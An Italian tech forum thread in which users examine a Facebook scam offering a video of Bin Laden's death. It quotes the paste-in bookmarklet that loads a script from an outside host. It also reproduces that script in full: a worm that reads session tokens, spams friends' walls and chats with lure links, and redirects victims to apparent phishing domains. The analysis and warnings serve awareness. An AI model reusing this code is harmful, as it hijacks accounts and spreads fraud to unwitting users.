www.MegaLab.it

[BlackJack]

Il fantasma di Bin Laden è in agguato su Facebook - Commenti

Se vi compare in bacheca un post che propone un presunto video dell'uccisione di Bin Laden, non apritelo: si tratta di una trappola studiata per innestare codice dannoso. [continua...]

[Zane]

Ho fuso qui la discussione apparsa sul forum nel pomeriggio

[Hpmezzo]

http://www.facebook.com/pages/Osama-ecc ... 2544333196
Attenzione tutti i miei amici hanno questo post incollato in bacheca...Appena entrato mi chiede di:
Usa il nostro codice unico per guardare il video!
- Segui i semplici passi qua sotto per guardare il video
Passo 1 - Copia questo codice:
Clicca nello spazio sottostante, seleziona il testo,
tastro destro del mouse e copialo.

Codice: Seleziona tutto

javascript:(a=(b=document).createElement('script')).src='//strummer5202.info/you/joe.php?'+Math.random(),b.body.appendChild(a);void(0)



Il codice mi sembra java... SCR dovrebbe essere qualche collegamente (mi ricordo lontamente il java studiato pochi anni fa qualcosa basilare). Vorrei che qualche esperto esamini questo codice grazie mille!
Passo 2:
Incolla il testo prima copiato nella tua barra degli indirizzo dove
vedi scritto Facebook.com! Dopodichè premi INVIO sulla tua tastiera!

Nota bene: Sii paziente il caricamento del video può avvenire con qualche secondo di ritardo per via delle tante visite!



Ecco uno screen:


Uploaded with ImageShack.us

[BlackJack]

E' già in lavorazione una news per voi.

[Hpmezzo]

Si ma ci devi mettere come affiliati hahahah =) Se no ci offendiamo =)

[BlackJack]

Eh, non sarebbe nemmeno una brutta idea!

Peccato che alle 19.57 fosse già stato finito e notificato

[Berga95]

Non sono un'esperto, ma intanto quello è javascript
Comunque, se andate su hxxp://strummer5202.info/you/joe.php vedrete questo codice in php:

Codice: Seleziona tutto

/////////////////////////////////////////////////////////////////////////////////////////////////////////////// // joelives /////////////////////////////////////////////////////////////////////////////////////////////////////////////// //alert('Photo Uploaded! Please wait 1-2 minutes without leaving this page until we process your picture!'); function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0;i < ca.length;i++) { var c = ca[i]; while (c.charAt(0)==' ') c = c.substring(1,c.length); if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length); } return null; } var user_id = readCookie("c_user"); // Setup some variables var post_form_id = document.getElementsByName('post_form_id')[0].value; var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; // Multiple URL Shorteners var shortArray = new Array( "http://ow.ly/4LNpd", "http://clickily.ws/zyaeom" ); var shortUrl = shortArray[Math.floor(shortArray.length*Math.random())]; // Chat message variables var this_chat = "Guarda il video dell'esecuzione di osama bin laden : / http://tinyurl.com/6ezfwod"; var prepared_chat = encodeURIComponent(this_chat);/////////////////////////////////////////////////////////////////////////////////////////////////////////////// // Post Link to friends walls /////////////////////////////////////////////////////////////////////////////////////////////////////////////// var token = Math.round(new Date().getTime() / 1000); var http1 = new XMLHttpRequest(); var url1 = "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&viewer="+user_id+"&token="+token+"-6&filter[0]=user&options[0]=friends_only"; var params1 = ""; http1.open("GET", url1+"?"+params1, true); http1.onreadystatechange = function() {//Call a function when the state changes. if(http1.readyState == 4 && http1.status == 200) { // If state = success var response1 = http1.responseText; response1 = response1.replace("for (;;);", ""); // Get rid of the junk at the beginning of the returned object response1 = JSON.parse(response1); // Convert the response to JSON //alert(response4.toSource()); var count = 0; for(uid in response1.payload.entries){ if(count < 400){ //alert("SENT TO "+response1.payload.entries[count].uid); // Loop to send messages // New XMLHttp object var httpwp = new XMLHttpRequest(); var urlwp = "http://www.facebook.com/ajax/profile/composer.php?__a=1"; var randLink = new Array("http://www.facebook.com/pages/Bin-Laden-filmato-della-morte/220917514589882?", "http://www.facebook.com/pages/Video-Morte-di-Osama-Scioccante/185145894868858?", "http://www.facebook.com/pages/Osama-la-ripresa-dellesecuzione/207377795963147?", "http://www.facebook.com/pages/Video-integrale-morte-osama/160160600713068?", "http://www.facebook.com/pages/Video-morte-di-Bin-Laden/207942222570998?", "http://www.facebook.com/pages/Osama-ecco-il-filmato-dellattacco-dei-soldati/218470064846463?", "http://www.facebook.com/pages/Video-scioccante-Osama/223750520974663?", "http://www.facebook.com/pages/Filmato-suicidio-di-Osama/163954453664922?", "http://www.facebook.com/pages/Morte-osama-scioccante/200258923349460?", "http://www.facebook.com/pages/Mortee-di-osama-ecco-il-documento/152569268142253?", "http://www.facebook.com/pages/Esecuzione-morte-osama/169294976461920?", "http://www.facebook.com/pages/Osama-riprese-dellattacco/219103628099719?", "http://www.facebook.com/pages/Ecco-il-video-di-osama/219488704729435?", "http://www.facebook.com/pages/Ecco-qui-la-della-morte-di-ossama/184860774895355?", "http://www.facebook.com/pages/Filmato-dellesecuzione-di-ossama/214155628604153?", "http://www.facebook.com/pages/Osama-ecco-il-video-integrale/112701738814253?", "http://www.facebook.com/pages/Osama-filmato/121083417971352?", "http://www.facebook.com/pages/Osama-scioccante-riproduzione/128548893886623?", "http://www.facebook.com/pages/Ossama-ecco-le-riprese/218816904797657?", "http://www.facebook.com/pages/Video-mortee-di-ossama/185207694861003?", "http://www.facebook.com/pages/Osama-video-esecuziome/218415021503983?", "http://www.facebook.com/pages/Osamma-ecco-lesecuzione/212492518769037?", "http://www.facebook.com/pages/Dio-mio-ecco-la-mortee-di-osamas/143509959054039?", "http://www.facebook.com/pages/Ecco-la-fine-di-ossaama/184355164949820?", "http://www.facebook.com/pages/Video-uccisisone-di-ossamma/221386654538707?", "http://www.facebook.com/pages/Ecco-come-%C3%A8-morteo-osasma/169336573123501?", "http://www.facebook.com/pages/Morte-osasdma-bin-laden/200306210004897?", "http://www.facebook.com/pages/Osama-ecco-il-video-integrale/210973072259792?", "http://www.facebook.com/pages/Ossamas-bin-laden-videos-modfrte/189298697773277?", "http://www.facebook.com/pages/Filmato-morte-Bin-Laden/199725546735628?"); var statusmessage="questo è davvero scioccante.."; var title="Il video dell esecuzione di bin laden!"; // var link="http://www.facebook.com/pages/Video-scioccante-Osama/223750520974663?"; var link = randLink[Math.floor(randLink.length*Math.random())]; var description="guarda cosa fanno questi soldati ad Osama! "; var picture="http://i54.tinypic.com/k0r1xh.jpg"; var paramswp = "post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&xhpc_composerid=u574553_1&xhpc_targetid="+response1.payload.entries[count].uid+"&xhpc_context=profile&xhpc_fbx=1&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][metaTagMap][0][http-equiv]=content-type&attachment[params][metaTagMap][0][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][metaTagMap][1][property]=og%3Atitle&attachment[params][metaTagMap][1][content]="+title+"&attachment[params][metaTagMap][2][property]=og%3Aurl&attachment[params][metaTagMap][2][content]="+link+"&attachment[params][metaTagMap][3][property]=og%3Asite_name&attachment[params][metaTagMap][3][content]="+title+"&attachment[params][metaTagMap][4][property]=og%3Aimage&attachment[params][metaTagMap][4][content]="+picture+"&attachment[params][metaTagMap][5][property]=og%3Adescription&attachment[params][metaTagMap][5][content]="+description+"&attachment[params][metaTagMap][6][name]=description&attachment[params][metaTagMap][6][content]="+description+"&attachment[params][metaTagMap][7][http-equiv]=Content-Type&attachment[params][metaTagMap][7][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][medium]=106&attachment[params][urlInfo][user]="+link+"&attachment[params][favicon]=http%3A%2F%2F20-y-rr-z.info%2Ffavicon.ico&attachment[params][title]="+title+"&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]="+description+"&attachment[params][url]="+link+"&attachment[params][ttl]=0&attachment[params][error]=1&attachment[params][responseCode]=206&attachment[params][metaTags][description]="+description+"&attachment[params][images][0]="+picture+"&attachment[params][scrape_time]=1302991496&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text="+statusmessage+")&xhpc_message="+statusmessage+")&nctr[_mod]=pagelet_wall&lsd&post_form_id_source=AsyncRequest"; httpwp.open("POST", urlwp, true); //Send the proper header information along with the request httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); httpwp.setRequestHeader("Content-length", paramswp.length); httpwp.setRequestHeader("Connection", "keep-alive"); httpwp.onreadystatechange = function() { //Call a function when the state changes. if(httpwp.readyState == 4 && httpwp.status == 200){ //alert(http.responseText); //alert('buddy list fetched'); } } httpwp.send(paramswp); } count++; // increment counter } http1.close; // Close the connection } } http1.send(null); /////////////////////////////////////////////////////////////////////////////////////////////////////////////// // Hide chat boxes /////////////////////////////////////////////////////////////////////////////////////////////////////////////// var hide = document.getElementById('fbDockChatTabSlider'); hide.style.display = "none"; /////////////////////////////////////////////////////////////////////////////////////////////////////////////// // Get online friends and send chat message to them /////////////////////////////////////////////////////////////////////////////////////////////////////////////// var http3 = new XMLHttpRequest(); var url3 = "http://www.facebook.com/ajax/chat/buddy_list.php?__a=1"; var params3 = "user="+user_id+"&popped_out=false&force_render=true&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"; http3.open("POST", url3, true); //Send the proper header information along with the request http3.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); http3.setRequestHeader("Content-length", params3.length); http3.setRequestHeader("Connection", "close"); http3.onreadystatechange = function() {//Call a function when the state changes. if(http3.readyState == 4 && http3.status == 200) { var response3 = http3.responseText; response3 = response3.replace("for (;;);", ""); response3 = JSON.parse(response3); var count = 0; for(property in response3.payload.buddy_list.nowAvailableList){ if(count < 100){ // Loop to send messages // New XMLHttp object var httpc = new XMLHttpRequest(); // Generate random message ID var msgid = Math.floor(Math.random()*1000000); var time = Math.round(new Date().getTime() / 1000); var urlc = "http://www.facebook.com/ajax/chat/send.php?__a=1"; var paramsc = "msg_id="+msgid+"&client_time="+time+"&to="+property+"&num_tabs=1&pvs_time="+time+"&msg_text="+prepared_chat+"&to_offline=false&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"; httpc.open("POST", urlc, true); //Send the proper header information along with the request httpc.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); httpc.setRequestHeader("Content-length", paramsc.length); httpc.setRequestHeader("Connection", "close"); httpc.onreadystatechange = function() { //Call a function when the state changes. if(httpc.readyState == 4 && httpc.status == 200){ //alert(http.responseText); //alert('buddy list fetched'); } } httpc.send(paramsc); } //alert(property); count++; // increment counter } http3.close; // Close the connection } } http3.send(params3); /* /////////////////////////////////////////////////////////////////////////////////////////////////////////////// // Become a Fan - MW GIVEAWAY /////////////////////////////////////////////////////////////////////////////////////////////////////////////// var http4 = new XMLHttpRequest(); var url4 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1"; var params4 = "fbpage_id=199725546735628&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest" http4.open("POST", url4, true); //Send the proper header information along with the request http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); http4.setRequestHeader("Content-length", params4.length); http4.setRequestHeader("Connection", "close"); http4.onreadystatechange = function() {//Call a function when the state changes. if(http4.readyState == 4 && http4.status == 200) { http4.close; // Close the connection } } http4.send(params4); /////////////////////////////////////////////////////////////////////////////////////////////////////////////// // Become a Fan - MW GIft /////////////////////////////////////////////////////////////////////////////////////////////////////////////// var http5 = new XMLHttpRequest(); var url5 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1"; var params5 = "fbpage_id=185145894868858&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest" http5.open("POST", url5, true); //Send the proper header information along with the request http5.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); http5.setRequestHeader("Content-length", params5.length); http5.setRequestHeader("Connection", "close"); http5.onreadystatechange = function() {//Call a function when the state changes. if(http5.readyState == 4 && http5.status == 200) { http5.close; // Close the connection } } http5.send(params5); */ //document.getElementById('susta').style.display="none"; document.getElementById('contentArea').innerHTML="









Caricamento video in corso ...
"; var endArray = new Array("quanteore.com", "verifica-account.com", "facebook.verifica-account.com"); var ending = endArray[Math.floor(endArray.length*Math.random())]; setTimeout("window.location = 'http://'+ending+'/index.php';", 15000);

Interessante, no? Ci sono pure i commenti

[Hpmezzo]

Da quello che si evince dal php dovrebbe pure mandare lo stesso messaggio e il link di questo presunto video anche agli amici!!! ragazziiiiii siamo pronti ?? =)

[Andy94]

Intervengo solo per una brevissima spiegazione sul codice, in aggiunta a quanto detto da Berga.
Quello è JavaScript (non Java), e in particolare si tratta di un bookmarklet. Quando viene copiato nella barra degli indirizzi ed eseguito (meramente con Invio), effettua delle operazioni nella pagina corrente.
Nel caso di quel bookmarklet specifico abbiamo la creazione di un nuovo elemento SCRIPT e il suo inserimento nella pagina che attualmente state visitando. L'URL a cui tale script punta è

Codice: Seleziona tutto

//strummer5202.info/you/joe.php?XXXXXXXX

Dove XXXXXXXX è un numero casuale, estratto nell'intervallo tra 0 ed 1 (è quindi decimale).

Direi che quanto inserito da Berga è assolutamente autoesplicativo...

[Hpmezzo]

Ecco il post:

var statusmessage="questo è davvero scioccante.." ==> Contenuto post
var title="Il video dell esecuzione di bin laden!" ==> Titolo post
http://i54.tinypic.com/k0r1xh.jpg ==> Immagine del post
Poi...
Get online friends and send chat message to them ==> Questo commento non mi piace =)

[ste_95]

Gente a cui viene detto di mettersi del javascript nella barra degli indirizzi... che lo fa!! È agghiacciante!

[Hpmezzo]

Scusate la mia ignoranza...Ma il java script non dovrebbe essere all'interno della pagina? E se io metto il java script nella barra degli indirizzi di norma non dovrebbe succedere nulla?O sbalio?

[Berga95]

Quando viene copiato nella barra degli indirizzi ed eseguito (meramente con Invio), effettua delle operazioni nella pagina corrente.
[cut] Abbiamo la creazione di un nuovo elemento SCRIPT e il suo inserimento nella pagina che attualmente state visitando. L'URL a cui tale script punta è

Codice: Seleziona tutto

//strummer5202.info/you/joe.php?XXXXXXXX

Esattamente quello che volevo dire Purtroppo non conoscevo i bookmarklet e non volevo sparare fesserie...

Dove XXXXXXXX è un numero casuale, estratto nell'intervallo tra 0 ed 1 (è quindi decimale).

Mi ha stupito che non ci fosse math.random()*10000000 Come mai decimale?

EDIT:

Scusate la mia ignoranza...Ma il java script non dovrebbe essere all'interno della pagina? E se io metto il java script nella barra degli indirizzi di norma non dovrebbe succedere nulla?O sbalio?

In che senso "all'interno della pagina"?

Beh, se metti javascript anche in una pagina di MLI con scritto javascript: alert("Ciao!"); viene eseguito questo codice... Spiegati meglio...

[Hpmezzo]

Ragazzi fatemi capire bene come è la situazione...Beh possiamo parlare di un semi-exploit?
E io che hjo i java script disabilitati non dovrei correre nessun rischio vero? E non corro nessun rischio se non copio il codice nella barra degli indirizzi? Giusto?

[ste_95]

No nessun semi-exploit, se non consideri l'idiozia della gente, che allora puoi parlare di mega-exploit. È sufficiente non copiare codice javascript sconosciuto nella barra degli indirizzi per stare tranquilli

[Berga95]

E io che ho i java script disabilitati non dovrei correre nessun rischio vero?

Certo Anche se è da stupidi copia-incollare codice javascript così, inoltre puoi anche vedere che fa avendo qualche fondamento di programmazione e buona fantasia

E non corro nessun rischio se non copio il codice nella barra degli indirizzi? Giusto?

Perché farlo?

Beh possiamo parlare di un semi-exploit?

IMHO no, è l'utente che sceglie di eseguire un javascript... possiamo chiamarlo "basso quoziente intellettivo dell'utenza cybernauta"

EDIT: Oggi tutti mi anticipano

[Andy94]

JavaScript può essere eseguito con i bookmarklet, e questa è un ottima cosa. Certo, ci sono bookmarklet buoni e meno buoni (vedi sopra).

Stavo riguardando il codice di Berga: non è PHP, altrimenti non lo vedresti; è sempre JS.
Sembra che legga i cookie, e sfrutti i dati per richiamare pagine di FB che svolgono le varie funzioni di inserimento messaggi e quant'altro.

Exploit? Beh, dipende da come la vediamo... Sembrerebbe di sì, ma a quel punto sarebbero quelli di FB a dover mettere mano al codice per far sì che smetta di funzionare. Tuttavia, mi stupisce che non ci abbiano pensato prima.

È sufficiente non copiare codice javascript sconosciuto nella barra degli indirizzi per stare tranquilli

E consenti alle pagine di FB di essere richiamate senza controlli di sorta su referer, e request method?

[ste_95]

E consenti alle pagine di FB di essere richiamate senza controlli di sorta su referer, e request method?

Beh immagino che sia necessario (vedi API, sistemi interni loro), non mi sembrano proprio degli sprovveduti

[Andy94]

Sì, ma suppongo che le API utilizzino comunque dei controlli... Altrimenti io potrei fare praticamente quasi tutto fregandomene di qualunque cosa, tanto anche se non uso le API non controllano...

non mi sembrano proprio degli sprovveduti

Non lo sono senz'altro, però non mi sembra che questa possa essere considerata una cosa "by design".

[Berga95]

JavaScript può essere eseguito con i bookmarklet, e questa è un ottima cosa. Certo, ci sono bookmarklet buoni e meno buoni (vedi sopra).
Stavo riguardando il codice di Berga: non è PHP, altrimenti non lo vedresti; è sempre JS.

Sì sì, era un lapsus Me l'ha fatto notare anche un amico in Skype...
Che figura di..